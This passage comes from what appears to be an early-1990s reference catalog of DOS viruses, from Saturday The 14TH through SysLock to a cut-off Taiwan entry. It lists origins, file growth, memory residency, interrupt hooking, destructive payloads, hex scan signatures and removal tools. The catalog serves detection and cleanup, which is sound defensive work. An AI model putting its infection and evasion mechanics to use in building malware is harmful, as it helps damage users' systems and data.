       is that when it copies itself to memory, it modifies the memory
       block so that it appears to belong to the operating system,
       thus avoiding another program reusing the block.

       Similar to the Icelandic-II virus, the Saratoga can infect
       programs even if the system has installed an anti-viral TSR
       which "hooks" interrupt 21, such as FluShot+.  Also like
       Icelandic-II is that this virus can infect programs which have
       been marked Read-Only, though it does not restore the Read-Only
       attribute to the file afterwards.

       Also see: Icelandic, Icelandic-II

 
 Virus Name:  Saturday The 14TH
 Aliases:     Durban
 V Status:    Rare
 Discovered:  March, 1990
 Symptoms:    TSR;.COM, .EXE, .OV? growth; corrupts boot sector,
              FAT. & partition table on Saturday 14th
 Origin:      Republic of South Africa
 Eff Length:  685 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V61+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, VirHunt 2.0+, Pro-Scan 2.01+
 General Comments:
       The first reports of the Saturday The 14TH virus came from
       South Africa in March 1990.  The Saturday The 14TH, or Durban
       Virus, is a memory resident generic file infector, infecting
       .COM, .EXE, and overlay files, but not COMMAND.COM.  Infected
       files will increase in length by between 669 and 684 bytes.

       The Saturday The 14TH virus activates on any Saturday that falls
       on the 14TH of any month, at which time it will overwrite the
       first 100 logical sectors of the C: drive, B: drive, and A:
       drive.  In effect, on drive C:, the virus destroys the hard
       disk boot sector, partition table, and file allocation table (FAT).

 
 Virus Name:  Scott's Valley
 Aliases:     2131
 V Status:    Rare
 Discovered:  September, 1990
 Symptoms:    TSR; .COM and .EXE growth
 Origin:      Scott's Valley, California, USA
 Eff Length:  2,131 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Scott's Valley Virus was discovered in September, 1990 in
       Scott's Valley, California.  This virus is a memory resident generic
       infector of .COM and .EXE files, and does not infect COMMAND.COM.

       The first time a program infected with the Scott's Valley Virus is
       executed, the virus installs itself memory resident as a low system
       memory TSR of 2,384 bytes.  Interrupt 21 is hooked by the virus.

       After the virus is memory resident, any .COM or .EXE file executed
       will be infected with the virus.  .COM files will increase in length
       by 2,131 bytes.  .EXE files will increase in length between 2,131
       and 2,140 bytes.

       Infected programs will contain the following hex string in the virus's
       code: 5E8BDE909081C63200B912082E.

       It is unknown if this virus is malicious.

 
 Virus Name:  Sentinel
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM & .EXE growth; decrease in available free memory
 Origin:      Bulgaria
 Eff Length:  4,625 Bytes
 Type Code:   PRHAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Sentinel Virus was submitted in January, 1991, and is from
       Bulgaria.  This virus is a memory resident infector of .COM and .EXE
       files, and will infect COMMAND.COM.  Unlike most viruses, this virus
       was received with its original Turbo Pascal source code.  It may be
       purely a research virus at this time.

       When the first program infected with Sentinel is executed, the virus
       will install itself memory resident at the top of system memory, but
       below the 640K DOS boundary.  Interrupt 12's return is not moved by
       the virus.  Interrupt 21 will be hooked by the virus in memory.
       COMMAND.COM, if not previously infected, will be infected by Sentinel
       at this time as well.

       After Sentinel is memory resident, it will infect .COM and .EXE
       programs larger than 1K as they are openned or executed.  Infected
       programs will have a file length increase of 4,625 bytes, the virus
       will be located at the end of the file.  This virus makes no attempt
       to hide the file length increase.  File date and time in the disk
       directory is not altered by the virus.

       The following text strings can be found at the very end of programs
       infected with Sentinel:

               "You won't hear me, but you'll feel me....
                (c) 1990 by Sentinel.
                With thanks to Borland."

       Sentinel does not appear to do anything besides replicate.

 
 Virus Name:  SF Virus
 Aliases:
 V Status:    Extinct
 Discovered:  December, 1987
 Symptoms:    BSC 360k floppies, Resident TOM, formatted disks
 Origin:      California, USA
 Eff Length:  N/A
 Type Code:   RtF - Resident Floppy Boot Sector Infector
 Detection Method: ViruScan (identifies as Alameda)
 Removal Instructions: MDisk, CleanUp, F-Prot, or DOS SYS command
 General Comments:
       The SF Virus is a modified version of the Alameda virus
       which activates when the counter in the virus has determined
       that it is infected 100 diskettes.  The virus replicates when
       a CTL-ALT-DEL is performed, infecting the disk in the floppy
       drive.  Upon activation, the diskette in the floppy drive is
       reformatted.  The SF Virus only infects 5 1/4" 360K floppies.

       Also see: Alameda


 Virus Name:  Shake Virus
 Aliases:
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    .COM growth, message, change in COMMAND.COM memory allocation
 Origin:      Bulgaria
 Eff Length:  476 Bytes
 Type Code:   PRCK - Resident Parasitic .COM Infector
 Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files
 General Comments:
       The Shake Virus was first isolated in Bulgaria in May, 1990 by
       Daniel Kalchev.  It is a memory resident generic .COM infector, and
       will infect COMMAND.COM.

       The first time an infected program is executed, the Shake Virus will
       install itself memory resident, altering the image of COMMAND.COM in
       memory.  

       The Shake Virus infects .COM files, infecting them as they are
       accessed.  Infected files increase in size by 476 Bytes, though the
       size increase cannot be seen using a DIR (list directory) command
       if the virus is memory resident.

       While the virus is not destructive, it will occasionally
       display the message: "Shake well before use !" when an infected
       file is attempted to be run.  When this message is displayed, the
       program terminates rather than executes.  A second attempt to run
       the same program result in it running successfully.


 Virus Name:  Slow
 Aliases:     Slowdown
 V Status:    Common
 Discovered:  May, 1990
 Symptoms:    .COM & .EXE growth
 Origin:      Australia
 Eff Length:  1,701 Bytes
 Type Code:   PRsA - Resident Parasitic .COM & .EXE Infector
 Detection Method: ViruScan V63+, Pro-Scan 1.4+
 Removal Instructions: CleanUp V67+, Scan/D, Pro-Scan 2.01+
 General Comments:
       The Slow Virus was discovered in Australia in May 1990.  It is
       a memory resident generic file infector, infected .COM, .EXE, and
       overlay files.  COMMAND.COM is not infected by this virus.

       The first time an infected file is executed on a system, the virus
       installs itself memory resident as a low system memory TSR, taking up
       1,984 bytes of free memory.  Interrupt 21 will be hooked by the virus.

       Later, as programs are executed, they will be infected by the Slow
       Virus.  While the Slow Virus's viral code is actually 1,701 bytes in
       length, infected files will increase by more than this amount.  Infected
       .COM files will increase in length by 1,721 bytes with the virus
       located at the beginning of the infected program.  .EXE files will
       increase in length by 1,716 to 1,728 bytes with the virus located at
       the end of the infected program.

       In the process of infecting some .EXE files, the virus may hang the
       system, causing the user to have to reboot.

       The Slow Virus is based on the Jerusalem B virus.

       It is unknown what else the Slow virus does.
  

 Virus Name:  Solano 2000
 Aliases:     Dyslexia 2.01
 V Status:    Rare
 Discovered:  March, 1990
 Symptoms:    .COM growth, TSR, unusual file errors
 Origin:      California, USA
 Eff Length:  2,000 Bytes
 Type Code:   PRsC - Resident Parasitic .COM Infector
 Detection Method: ViruScan V60+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files
 General Comments:
       The Solano 2000 Virus was first isolated in Solano County,
       California in mid-March 1990 by Edward Winters.  The virus may
       also be known by the name Dyslexia Virus V2.01, which can be
       produced by negating some null terminated bytes within the
       viral code.  Using the same technique, what appears to be the
       creation date of the virus, 08FEB90, can be produced.  The
       information regarding the information produced by negation of
       bytes was determined by Jay Parangalan of Solano County.
       
       The Solano 2000 Virus is a generic .COM file infector.  The first
       time an infected .COM file is executed on the system, the virus
       installs itself memory resident, then proceeds to infect every
       .COM file that is executed.  Infected programs can be manually
       identified by using a sector editor to view the file.  Bytes
       1168 thru 1952 will consist of '(' or 28h characters.

       Some programs, such as DiskCopy.COM which is included on all
       DOS diskettes, will not run after being infected with this virus,
       instead an "invalid drive specification" message will be
       displayed.  This message is not in the viral code, but is due
       to an error condition being induced due to the virus's presence.
       The virus-induced error occurring with the DiskCopy program was how
       the virus was first spotted and eventually isolated.

       This particular virus, in its current state, does not survive a
       system warm reboot (CTL-ALT-DEL).  When it is memory resident, it
       takes up 3K bytes of RAM.

       The Solano 2000 Virus does no apparent system damage, however it
       does check the video buffer occasionally, and may transpose
       numbers if they are found in certain locations.  This effect,
       however, was not experienced on the author's system in researching
       this virus.  There have also been reports that instead of transposing
       numeric characters, the Solano virus may change color attributes on
       the display screen when it is active in memory.

       Known variants of the Solano 2000 virus:
       Solano 2000-B: same as Solano 2000, except the 28h characters
             have been changed to DAh characters, and are located in
             bytes 1168 thru 1912 in infected files.
       Dyslexia 2.00: same as Solano 2000, except that the 28h characters
             are now binary zeros.  The attempted transposing of numeric
             characters in video memory has also been slowed down.  The
             creation date appears to be 22JAN90 instead of 08FEB90.

       Also see: Subliminal 1.10


 Virus Name:  Sorry
 Aliases:     G-Virus V1.3
 V Status:    Rare
 Discovered:  June, 1990
 Symptoms:    .COM growth, decrease in system and free memory
 Origin:
 Eff Length:  731 Bytes
 Type Code:   PRNCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V64+, F-Prot, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, Pro-Scan 2.01+, or delete infected files
 General Comments:
       The Sorry Virus was isolated in June, 1990.  Its name comes from
       a german phrase in the virus: "Tut mir Leid !".  This
       virus is based on the Perfume Virus from West Germany, and some
       anti-viral programs will identify it as Perfume or 4711.

       The first time a program infected with the Sorry Virus is executed,
       the virus will install itself memory resident in high memory.  Total
       system memory and free memory will both decrease by 1,024 bytes.
       Interrupt 21 will be hooked by the virus.  COMMAND.COM is immediately
       infected by the virus, thus insuring on later system boots that the
       virus becomes memory resident immediately.

       After the virus is memory resident, it will infect any .COM file
       which is executed, increasing the file's length by 731 bytes.  The
       viral code is located at the end of infected files.

       The Sorry Virus contains the following text strings:

                "G-VIRUS V1.3"
                "Bitte gebe den G-Virus Code ein"
                "Tut mir Leid !"

       It is unknown what the Sorry Virus does when it activates.

       Also see: Perfume


 Virus Name:  Spyer
 Aliases:
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    TSR; .COM & .EXE growth; system hangs
 Origin:      Taiwan
 Eff Length:  1,181 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V71+
 Removal Instructions: Scan/D or Delete infected files
 General Comments:
       The Spyer Virus was isolated in November, 1990 in Taiwan.  This virus
       is a memory resident infector of .COM and .EXE files.  It does not
       infect COMMAND.COM.

       The first time a program infected with the Spyer Virus is executed,
       the Spyer Virus will install itself memory resident as a 1,760 byte
       low system memory TSR.  Interrupts 21 and 22 will be hooked by the
       virus.

       Once the virus is memory resident, the virus will attempt to infect
       the next program that is executed.  If the program is already infected
       with the Spyer Virus, the system will become hung.  If the program was
       not already infected, Spyer will infect it and then hang the system.

       Infected .COM files will always increase in length by 1,181 bytes.
       .EXE files infected with Spyer will have a file length increase between
       1,181 and 1,195 bytes.  In both cases, the virus will be located at
       the end of the infected file.  Infected files will also always have the
       following hex character sequence at the end of file: "CBDFD9DE848484".

       The Spyer Virus, in its present form, is not expected to ever be a
       serious problem.  Since it always hangs the system when the next program
       is executed after becoming memory resident, it is simply too obvious
       that something is wrong.


 Virus Name:  Stone`90
 Aliases:     Polish 961, Stone-90
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth
 Origin:      Poland
 Eff Length:  961 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Stone`90 Virus, or Polish 961, is a non-resident direct action
       infector of .COM programs, including COMMAND.COM.  It was submitted
       in December, 1990, and is from Poland.

       When a program infected with the Stone`90 Virus is executed, the virus
       will look for one .COM program on the current drive and in the current
       directory to infect.  If one is found, the virus will infected it.
       The newly infected .COM program will increase in length by 961 bytes,
       and have the virus's code located at the end of the program.

       The following text strings can be found in infected files:

               "Sorry, I`m INFECTED!"
               "I`m already NOT infected!"
               "(C) Stone`90"

       Stone`90 does not appear to do anything besides replicate.


 Virus Name:  Stoned
 Aliases:     Donald Duck, Hawaii, Marijuana, New Zealand, Rostov, San Diego,
              Sex Revolution, Smithsonian, Stoned II
 V Status:    Common
 Discovered:  February, 1988
 Symptoms:    BSC, TSR, messages, RLL controller hangs
 Origin:      New Zealand
 Eff Length:  N/A
 Type Code:   BRtX - Resident Boot Sector & Partition Table Infector
 Detection Method:  ViruScan, CleanUp, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  CleanUp, MDisk, F-Prot, Pro-Scan 1.4+
 General Comments:
       The Stoned virus was first reported in Wellington, New Zealand in
       early 1988.  The original virus only infected 360KB 5 1/4" diskettes,
       doing no overt damage.  The original diskette-only infector is extinct,
       however, and all known variants of this virus are capable of infecting
       the hard disk partition table as well as may damage directory or FAT
       information.  Most variants of this virus have only minor modifications,
       usually in what the message is that the virus may display on boot.

       When a computer system is booted with a Stoned infected disk, this
       virus will install itself memory resident at the top of system memory.
       The interrupt 12 return will be moved, and ChkDsk will indicate that the
       computer system as 2K less total memory than what is installed.  If the
       system boot was from a diskette, the virus will also attempt to infect
       the hard disk partition table, if it was not previously infected.

       During the boot process, the Stoned Virus may display a message.  The
       message is displayed more or less on a random basis.  The most common
       text for the message is:

               "Your computer is now stoned."

       Or:

               "Your PC is now Stoned!"

       After Stoned is memory resident, it will infect diskettes as they are
       accessed on the system.  When Stoned infects a diskette, it moves the
       original boot sector (sector 0) to sector 11.  The Stoned Virus then
       copies itself into sector 0.  Since sector 11 is normally part of the
       diskette root directory on 360K 5.25" diskettes, any files which had
       their directory entries located in this sector will be lost.  Some
       versions of DOS have sector 11 as part of the File Allocation Table,
       which may also result in the disk's FAT being corrupted.

       When Stoned infects that system hard disk, it copies the hard disk's
       original partition table to side 0, cyl 0, sector 7.  A copy of the
       Stoned Virus is then placed at side 0, cyl 0, sector 1, the original
       location of the hard disk partition table.  If the hard disk was
       formatted with software which starts the boot sector, file allocation
       table, or disk directory on side 0, cyl 0 right after the partition
       table, the hard disk may be corrupted as well.

       In order to disinfect a system infected with the Stoned Virus, the
       system must be powered off and booted with an uninfected, write-
       protected boot diskette.  If this is not done, the virus may reinfect
       diskettes as soon as they are disinfected.

       There are many programs which can disinfect Stoned infected diskettes
       and hard disks.  To successfully use one of these, follow the
       instructions with the program.

       To remove Stoned manually, the DOS SYS command can be used on 5.25"
       360K diskettes.  On the hard disk, the original partition table must
       be copied back to side 0, cyl 0, sector 1.  This can be performed with
       Norton Utilities, or other sector editors.

       Known variants of the Stoned Virus are:
       Stoned-A : Same as Stoned above, but does not infect the system hard
                  disk.  This is the original virus and is now extinct.  The
                  text found in the boot sector of infected diskettes is:
                  "Your computer is now stoned.  Legalize Marijuana".
                  The "Legalize Marijuana" portion of the text is not
                  displayed.
       Stoned-B : Same as Stoned indicated above.  Systems with RLL controllers
                  may experience frequent system hangs.  Text typically found
                  in this variant is:
                  "Your computer is now stoned.  Legalise Marijuana".
                  The "Legalise Marijuana" may also be in capital letters, or
                  may be partially overwritten.  It is not displayed.
       Stoned-C : same as Stoned, except that the message has been
                  removed.
       Stoned-D : same as Stoned, with the exception that this variant
                  can infect high density 3.5" and 5.25" diskettes.
       Stoned II: Based on Stoned-B, this variant has been modified to
                  avoid detection by anti-viral utilities.  Since its
                  isolation in June, 1990, most utilities can now detect
                  this variant.  Text in the virus has been changed to:
                  "Your PC is now Stoned!  Version 2"
                  Or:
                  "Donald Duck is a lie."
                  The "Version 2" portion of the text may be corrupted as well.

       Rostov   : Similar to Stoned-B, this variant does not display any
                  message.  It contains the text:
                  "Non-system disk" and "Replace and strike".
                  Submitted in December, 1990, origin unknown.
       Sex Revolution V1.1 :
                  Submitted in December, 1990, this variant is similar to
                  Stoned-B.  This variant may display the following message:
                  "EXPORT OF SEX REVOLUTION ver. 1.1"
       Sex Revolution V2.0 :
                  Similar to Sex Revolution V1.1, the message has been changed
                  to:
                  "EXPORT OF SEX REVOLUTION ver. 2.0"
       Stoned-E : Similar to Stoned-B, this variant now emits a "beep" thru
                  the system speaker when the following message is displayed:
                  "Your PC is now Stoned!"
                  The text "LEGALISE MARIJUANA!" can also be found in the
                  boot sector and system partition table.
       Stoned-F : Similar to Stoned-E, this variant also emits a "beep" thru
                  the system speaker when its message is displayed.  The
                  displayed message is:
                  "Twoj PC jest teraz be!"
                  The text "LEGALISE MARIJUANA?" can also be found in the
                  boot sector and system partition table.


 Virus Name:  Subliminal 1.10
 Aliases:
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    .COM growth, TSR, unusual file errors, video display flicker
 Origin:      California, USA
 Eff Length:  1,496 Bytes
 Type Code:   PRsC - Resident Parasitic .COM Infector
 Detection Method: ViruScan V64+, Pro-Scan 1.4+
 Removal Instructions: Scan/D, Pro-Scan 1.4+, or Delete Infected Files
 General Comments:
       The Subliminal 1.10 Virus was first isolated in Solano County,
       California in May 1990 by Jay Parangalan.  The name of the
       virus can be produced by negating (XORing with FF) some null
       terminated bytes in the viral code.  Using this technique, the
       creation date of the virus appears to be 02OCT89.  The
       Subliminal 1.10 Virus appears to be a very early version of the
       Solano 2000 Virus, and has only been reported at Solano
       Community College.

       The first time a program infected with the Subliminal 1.10 Virus
       is executed, the virus installs itself memory resident.  Any
       .COM files which are then executed are infected.  Infected
       programs will increase in length by 1,496 bytes.

       With the virus memory resident, the system monitor will appear to
       flicker.  What is occurring is that the virus is attempting to
       flash the message "LOVE, REMEMBER?" in the lower left portion of
       the display for a subliminal duration.  The actual amount of time
       the message displays on the screen varies between systems due to
       CPU speed.

       Also see: Solano 2000


 Virus Name:  Sunday
 Aliases:
 V Status:    Common
 Discovered:  November, 1989
 Symptoms:    TSR, executable file growth, messages, FAT corruption
 Origin:      Washington (state), USA
 Eff Length:  1,636 Bytes
 Type Code:   PRsAT - Parasitic Resident .COM, .EXE. & .OV? Infector
 Detection Method:  ViruScan V49+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp, Scan/D, F-Prot, Pro-Scan 1.4+, VirexPC,
              VirHunt 2.0+
 General Comments:
       The Sunday virus was discovered by many users in the Seattle,
       Washington area in November, 1989.  This virus activates on
       any Sunday, displaying the message:

           "Today is Sunday! Why do you work so hard?
            All work and no play make you a dull boy!
            Come on! Let's go out and have some fun!"

       The Sunday virus appears to have been derived from the
       Jerusalem virus, the viral code being similar in many
       respects.

       Damage to the file allocation table or FAT has been reported
       from a number of infected users.

       Known variants of the Sunday Virus are:
       Sunday-B : Similar to the Sunday Virus, this variant does not activate
                  on any day of the week due to an error in the day of the
                  week checking routine.  The message in the virus is never
                  displayed, and no damage is done to the file allocation
                  table.
       Sunday-C : Similar to Sunday-B, this variant also never activates.  It
                  has, however, been modified so that it differs from both
                  the Sunday and Sunday-B viruses.  Functionally, it is the
                  same as Sunday-B.


 Virus Name:  Suriv 1.01
 Aliases:     April 1st, Israeli, Suriv01
 V Status:    Extinct
 Discovered:  April, 1987
 Symptoms:    TSR, .COM growth, messages, system lock April 1st
 Origin:      Israel
 Eff Length:  897 bytes
 Type Code:   PRsC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  Scan/D/X, F-Prot, VirHunt 2.0+, or UnVirus
 General Comments:
       The Suriv 1.01 virus is a memory resident .COM infector.  It
       will activate on April 1st after memory is infected by running
       an infected file and then a uninfected .COM file is executed.
       On activation, it will display the message:

       "APRIL 1ST HA HA HA YOU HAVE A VIRUS".

       The system will then lock up, requiring it to be powered off and
       then back on.

       The text "sURIV 1.01" can be found in the viral code.


 Virus Name:  Suriv 2.01
 Aliases:     April 1st-B, Israeli, Suriv02
 V Status:    Extinct
 Discovered:  1987
 Symptoms:    TSR, .EXE growth, messages, system lock April 1st
 Origin:      Israel
 Eff Length:  1,488 bytes
 Type Code:   PRsE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, VirexPC, Pro-Scan,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  Scan/D/X, F-Prot, UnVirus, VirHunt 2.0+
 General Comments:
       The Suriv 2.01 virus is a memory resident .EXE infector.  It
       will activate on April 1st after memory is infected by running
       an infected file, displaying the same message as Suriv 1.01
       and locking up the system.  The virus will cause a similar
       lockup, though no message, 1 hour after an infected .EXE file
       is executed on any day on which the system default date of
       01-01-80 is used.  The virus will only infect the file once.


 Virus Name:  Suriv 3.00
 Aliases:     Israeli, Suriv03
 V Status:    Extinct
 Discovered:  1988
 Symptoms:    TSR, .COM, .EXE, & .SYS growth; Black Window; system slowdown
 Origin:      Israel
 Eff Length:  1,813 (COM files) & 1,808 (EXE files) bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: CleanUp, Scan/D/X, F-Prot, Unvirus, VirHunt 2.0+
 General Comments:
       May be a variant of the Jerusalem virus.  The string "sUMsDos"
       has been changed to "sURIV 3.00".  The Suriv 3.00 virus
       activates on Friday The 13ths when an infected program is
       run or if it is already present in system memory, however
       files are not deleted due to a bug in the viral code.

       Other than on Friday The 13ths, after the virus is memory
       resident for 30 seconds, an area of the screen is turned into
       a "black window" and a time wasting loop is executed with
       each timer interrupt.

       As with the Jerusalem B viruses, this virus can also infect
       overlay, .SYS, and other executable files besides .EXE and
       .COM files, though it does not infect COMMAND.COM itself.

       Also see: Jerusalem, Jerusalem B


 Virus Name:  Sverdlov
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; decrease in total system and available memory
 Origin:      USSR
 Eff Length:  1,962 Bytes
 Type Code:   PRhAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected programs
 General Comments:
       The Sverdlov Virus was submitted in December, 1990.  This virus is
       believed to have originated in the USSR.  Sverdlov is a memory resident
       infector of .COM and .EXE files, and will infect COMMAND.COM.  This
       virus is also encrypted.

       The first time a program infected with the Sverdlov Virus is executed,
       the virus will install itself memory resident at the top of system
       memory but below the DOS 640K boundary.  4,080 bytes of memory will
       have been reserved, and the interrupt 12 return is not altered by the
       virus.  The DOS ChkDsk program will indicate that total system memory
       and available free memory is 4,080 bytes less than expected.
       COMMAND.COM will also be infected at this time if it was not already
       infected.

       Once Sverdlov is memory resident, any .COM or .EXE file over 2K in
       length will become infected if it is executed or openned for any reason.
       Infected .COM files have a file length increase of 1,962 bytes.
       Infected .EXE files will have a file length increase of 1,962 to
       1,977 bytes in length.  In both cases, the virus will be located at the
       end of infected programs.

       It is unknown if Sverdlov does anything besides replicate.


 Virus Name:  SVir
 Aliases:
 V Status:    Endangered
 Discovered:  1990
 Symptoms:    .EXE growth; file date/time changes; system hangs
 Origin:      Poland
 Eff Length:  512 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:
 Removal Instructions: Delete infected programs
 General Comments:
       The SVir Virus was originally isolated in Poland early in 1990.  The
       original virus which was isolated had a fatal flaw in its code which
       prevented it from executing.  In August, 1990, a sample was obtained
       from Fridrik Skulason which now does replicate.  This second sample,
       identified as SVir-B, is a non-resident infector of .EXE files.

       Each time a program infected with the SVir-B Virus is executed, the
       virus will infect one .EXE file.  Infected files will increase in
       length between 516 and 526 bytes with the virus's code appended to the
       end of the file.  If the virus could not find an .EXE file to infect,
       it will leave the drive "spinning" as it will be in an endless loop
       looking for a file to infect.

       Interestingly enough, this virus will only infect files located on the
       A: drive.

       Infected files will also have their date/time in the disk directory
       changed to the date and time when the infection occurred.

       SVir, at least in the two known variants, does not do anything
       malicious, it simply replicates.

       Known variants of SVir are:
       SVir-A : The original "virus" from Poland in early 1990 which did not
                replicate.
       SVir-B : A variant isolated in August, 1990 which has the bug in SVir-A
                fixed so that it will now replicate.


 Virus Name:  Swap
 Aliases:     Falling Letters Boot, Israeli Boot
 V Status:    Rare
 Discovered:  August, 1989
 Symptoms:    Graphic display, BSC (floppy only), TSR, bad cluster,
 Origin:      Israel
 Eff Length:  N/A
 Type Code:   RsF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, VirexPC, VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, F-Prot, or DOS SYS Command
 General Comments:
       The Swap Virus, or Israeli Boot Virus, was first reported in
       August 1989.  This virus is a memory resident boot sector
       infector that only infects floppies.  The floppy's boot
       sector is infected the first time it is accessed.  One bad
       cluster will be written on track 39, sectors 6 and 7 with the
       head unspecified.  If track 39, sectors 6 and 7, are not
       empty, the virus will not infect the disk.  Once the virus
       is memory resident, it uses 2K or RAM.  The actual length of
       the viral code is 740 bytes.

       The Swap virus activates after being memory resident for 10
       minutes.  A cascading effect of letters and characters on the
       system monitor is then seen, similar to the cascading effect
       of the Cascade and Traceback viruses.

       The virus was named the Swap virus because the first isolated
       case had the following phrase located at bytes 00B7-00E4 on
       track 39, sector 7:

           "The Swapping-Virus. (C) June, 1989 by the CIA"

       However, this phrase is not found on diskettes which have been
       freshly infected by the Swap virus.

       A diskette infected with the Swap virus can be easily identified
       by looking at the boot sector with a sector editor, such as
       Norton Utilities.  The error messages which normally occur at
       the end of the boot sector will not be there, instead the start
       of the virus code is present.  The remainder of the viral code
       is located on track 39, sectors 6 and 7.


 Virus Name:  Swedish Disaster
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    BSC; Partition Table Altered;
              Decrease in system and available free memory
 Origin:      Sweden
 Eff Length:  N/A
 Type Code:   BRhX - Resident Boot Sector & Partition Table Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: MDisk/P
 General Comments:
       The Swedish Disaster was isolated in January, 1991.  This virus appears
       to be from Sweden.  It is a memory resident infector of floppy boot
       sectors and the hard disk partition table.

       When the system is booted from a diskette whose boot sector is infected
       with the Swedish Disaster Virus, the virus will infect the system
       hard disk's partition table, with the original hard disk partition
       table moved to side 0, cylinder 0, sector 6.  The virus will also
       install itself memory resident at the top of system memory but below
       the 640K DOS boundary.  Total system memory will decrease by 2,048
       bytes, available free memory will be 6,944 bytes less than what is
       expected by the user.  Interrupt 12's return will have been moved by
       the virus.

       After Swedish Disaster is memory resident, the virus will infect all
       non-write protected diskettes which are accessed on the system.  On
       360K 5.25" diskettes, the original boot sector will have been moved
       to sector 11, which is normally a part of the root directory.  This
       means that if the disk originally had directory entries in that sector,
       they will be lost.

       The following text string can be found at the end of the boot sector
       of infected diskettes, as well as within the partition table on infected
       hard disks:

               "The Swedish Disaster"

       Diskettes infected with the Swedish Disaster can be disinfected by
       powering off the system and rebooting from a write-protected original
       DOS diskette.  The DOS Sys command can then be used to replace the
       boot sector on infected diskettes.  For hard disks, the MDisk/P program
       will remove this virus, though the above text string will remain in
       the partition table.


 Virus Name:  Swiss 143
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; File date/time changes
 Origin:      Switzerland
 Eff Length:  143 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Swiss 143 Virus was submitted in January, 1991, by Dany Schoch of
       Hagendern, Switzerland.  This virus is a non-memory resident infector
       of .COM files, including COMMAND.COM.

       When a program infected with Swiss 143 is executed, the virus will
       infect all .COM files in the current directory.  Infected programs
       will increase in length by 143 bytes, the virus will be located at the
       end of the infected program.  The disk directory date and time will also
       be altered to the current system date and time when the programs were
       infected.

       This virus does not do anything besides replicate.


 Virus Name:  SysLock
 Aliases:     3551, 3555
 V Status:    Endangered
 Discovered:  November, 1988
 Symptoms:    .COM & .EXE growth, data file corruption 
 Origin:      
 Eff Length:  3,551 Bytes
 Type Code:   PNA - Encrypting Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, Pro-Scan, AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D, or F-Prot
 General Comments:
       The SysLock virus is a parasitic encrypting virus which
       infects both .COM and .EXE files, as well as damaging some
       data files on infected systems.  This virus does not install
       itself memory resident, but instead searches through the
       .COM and .EXE files and subdirectories on the current disk,
       picking one executable file at random to infect.  The
       infected file will have its length increased by approximately
       3,551 bytes, though it may vary slightly depending on file
       infected.

       The SysLock virus will damage files by searching for the word
       "Microsoft" in any combination of upper and lower case
       characters, and when found replace the word with "MACROSOFT".

       If the SysLock virus finds that an environment variable
       "SYSLOCK" exists in the system and has been set to "@" (hex 40),
       the virus will not infect any programs or perform string
       replacements, but will instead pass control to its host
       immediately.

       Known variant(s) of SysLock are:
       Advent  : Reported to be a Syslock variant, the sample of this virus
                 received by the author does not replicate.  All known
                 samples of this virus available from anti-viral researchers
                 also do not replicate.  Fridrik Skulason of Iceland has
                 indicated that this virus will only replicate it is on an
                 infected .EXE file, and then it will only infect .COM
                 files.  This variant is thought to be extinct.
       Macho-A : same as the SysLock virus, except that "Microsoft"
                 is replaced with "MACHOSOFT".

       Also see: Cookie

 Virus Name:  Taiwan
 Aliases:     Taiwan 2, Taiwan-B
 V Status:    Endangered
 Discovered:  January, 1990
 Symptoms:    .COM growth, 8th day any month corrupts BOOT, FAT,
              & Partition tables.
 Origin:      Taiwan
 Eff Length:  743 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V56+, F-Prot, Pro-Scan 1.4+, VirexPC
